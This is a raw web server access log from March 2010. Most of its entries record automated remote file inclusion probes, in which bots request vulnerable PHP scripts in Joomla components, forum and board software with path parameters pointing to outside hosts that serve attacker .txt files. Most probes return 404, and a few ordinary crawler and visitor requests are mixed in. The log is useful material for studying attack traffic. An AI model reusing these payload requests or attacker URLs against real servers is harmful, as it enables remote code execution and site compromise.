124.217.242.70 - - [19/Mar/2010:02:20:37 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:02:20:37 -0400] "GET /logs/access_log.Q110011600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:03 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:04 -0400] "GET /logs/access_log.Q109101100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:04 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:04 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:04 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:04 -0400] "GET /logs/access_log.Q109101100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:04 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:09 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:18 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:18 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:18 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
119.235.237.93 - - [19/Mar/2010:02:21:10 -0400] "GET /logs/access_log.Q109112900 HTTP/1.1" 200 2295103 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
118.217.216.132 - - [19/Mar/2010:02:21:22 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:22 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:22 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:27 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:27 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:28 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:28 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:28 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:30 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:32 -0400] "GET /logs/error_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
220.181.7.122 - - [19/Mar/2010:02:21:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
118.217.216.132 - - [19/Mar/2010:02:21:41 -0400] "GET /logs/error_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:41 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:41 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:21:42 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:45 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:45 -0400] "GET /logs/access_log.Q109101100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:45 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:21:45 -0400] "GET /logs/access_log.Q109101100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:02:21:54 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:02:21:54 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:02:21:54 -0400] "GET /logs/access_log.Q109052100%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:22:08 -0400] "GET /logs/error_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.115.68.164 - - [19/Mar/2010:02:22:28 -0400] "GET /logs/access_log.Q109060200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
199.120.90.223 - - [19/Mar/2010:02:22:33 -0400] "GET /logs/access_log.Q109091100//include/mail.inc.php?root=http://geo.metodist.ru/images/id? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
199.120.90.223 - - [19/Mar/2010:02:22:33 -0400] "GET //include/mail.inc.php?root=http://geo.metodist.ru/images/id? HTTP/1.1" 404 219 "-" "libwww-perl/5.812"
199.120.90.223 - - [19/Mar/2010:02:22:33 -0400] "GET /logs//include/mail.inc.php?root=http://geo.metodist.ru/images/id? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
123.125.66.78 - - [19/Mar/2010:02:22:39 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
118.217.216.132 - - [19/Mar/2010:02:23:12 -0400] "GET /logs/access_log.Q109061600%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:02:23:02 -0400] "GET /logs/access_log.Q109082200 HTTP/1.1" 200 2103181 "-" "Yandex/1.01.001 (compatible; Win16; I)"
79.52.232.120 - - [19/Mar/2010:02:23:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.52.232.120 - - [19/Mar/2010:02:23:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.52.232.120 - - [19/Mar/2010:02:23:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.52.232.120 - - [19/Mar/2010:02:23:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.52.232.120 - - [19/Mar/2010:02:24:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.249.65.18 - - [19/Mar/2010:02:24:19 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
78.110.50.114 - - [19/Mar/2010:02:24:24 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:24:24 -0400] "GET /logs/error_log.Q109123000%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:24:24 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:24:29 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:24:29 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:24:29 -0400] "GET /logs/error_log.Q109123000%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:24:29 -0400] "GET /logs/access_log.Q109101700%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.52.232.120 - - [19/Mar/2010:02:24:34 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.197.232.13 - - [19/Mar/2010:02:24:53 -0400] "GET /logs/error_log.Q110020300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:02:24:53 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:02:24:53 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:02:24:56 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:02:24:56 -0400] "GET /logs/error_log.Q110020300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:02:24:56 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:02:24:57 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:02:24:58 -0400] "GET /logs/access_log.Q109101700%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:02:25:00 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Mar/2010:02:25:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.241.177.123 - - [19/Mar/2010:02:25:57 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:02:25:57 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:02:25:57 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
116.12.50.45 - - [19/Mar/2010:02:26:33 -0400] "GET /logs/access_log.Q109051800///main.php?appserv_root=http://www.painkiller.de/CMS/modules/byz9991.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.223 - - [19/Mar/2010:02:26:41 -0400] "GET //////?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 456 "-" "libwww-perl/5.812"
118.217.216.132 - - [19/Mar/2010:02:27:10 -0400] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:27:10 -0400] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:27:12 -0400] "GET /logs/access_log.Q109091600%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:27:12 -0400] "GET /logs/access_log.Q109100400%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:27:13 -0400] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:27:14 -0400] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:27:14 -0400] "GET /logs/access_log.Q109100400%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:27:15 -0400] "GET /logs/access_log.Q109091600%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:27:19 -0400] "GET /logs/access_log.Q109061600%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:27:30 -0400] "GET /logs/access_log.Q109061600%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:02:27:35 -0400] "GET /ihm.php?p=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:02:27:35 -0400] "GET /logs/ihm.php?p=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:02:27:35 -0400] "GET /logs/access_log.Q110010900%20%20/ihm.php?p=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:02:27:39 -0400] "GET /logs/error_log.Q110010900%20%20/ihm.php?p=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.142.61.173 - - [19/Mar/2010:02:27:46 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
174.142.61.173 - - [19/Mar/2010:02:27:46 -0400] "GET /logs/access_log.Q109080600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
174.142.61.173 - - [19/Mar/2010:02:27:46 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:28:01 -0400] "GET /logs/access_log.Q109061600%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:28:32 -0400] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:28:35 -0400] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:28:36 -0400] "GET /logs/access_log.Q109100400%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:28:36 -0400] "GET /logs/access_log.Q109091600%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:02:28:48 -0400] "GET /logs/error_log.Q110020300//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:02:28:36 -0400] "GET /logs/error_log.Q109090200 HTTP/1.1" 200 2880120 "-" "Yandex/1.01.001 (compatible; Win16; I)"
216.121.63.153 - - [19/Mar/2010:02:29:08 -0400] "GET /logs/access_log.Q110010900/ihm.php?p=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:02:29:08 -0400] "GET /logs/error_log.Q110010900/ihm.php?p=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
118.129.166.213 - - [19/Mar/2010:02:29:18 -0400] "GET /ihm.php?p=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
118.129.166.213 - - [19/Mar/2010:02:29:18 -0400] "GET /logs/access_log.Q110010900%20%20/ihm.php?p=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
118.129.166.213 - - [19/Mar/2010:02:29:19 -0400] "GET /logs/ihm.php?p=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
118.129.166.213 - - [19/Mar/2010:02:29:24 -0400] "GET /logs/error_log.Q110010900%20%20/ihm.php?p=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:02:29:24 -0400] "GET /logs/access_log.Q109072700%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.142.61.173 - - [19/Mar/2010:02:29:50 -0400] "GET /logs/access_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:29:58 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:29:58 -0400] "GET /logs/access_log.Q110031100%20%20//yabbse/Sources/Packages.php?sourcedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:29:58 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:18 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:18 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:18 -0400] "GET /logs/access_log.Q110031100%20%20//yabbse/Sources/Packages.php?sourcedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.109.16.40 - - [19/Mar/2010:02:30:21 -0400] "GET /logs//bbs//delete_all.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
62.109.16.40 - - [19/Mar/2010:02:30:21 -0400] "GET /logs/access_log.Q110012500%20%20//bbs//delete_all.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:26 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:26 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:26 -0400] "GET /logs/access_log.Q110031100%20%20//yabbse/Sources/Packages.php?sourcedir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.109.16.40 - - [19/Mar/2010:02:30:26 -0400] "GET //bbs//delete_all.php?board_skin_path=http://luwahu.fileave.com/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:28 -0400] "GET /logs/error_log.Q110031100%20%20//yabbse/Sources/Packages.php?sourcedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:28 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:30 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
118.217.216.132 - - [19/Mar/2010:02:30:31 -0400] "GET /logs/access_log.Q110031100%20%20//yabbse/Sources/Packages.php?sourcedir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.223.177.217 - - [19/Mar/2010:02:30:33 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 228 "-" "-"
203.223.177.217 - - [19/Mar/2010:02:30:33 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 223 "-" "-"
118.217.216.132 - - [19/Mar/2010:02:30:55 -0400] "GET /logs/error_log.Q110031100%20%20//yabbse/Sources/Packages.php?sourcedir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
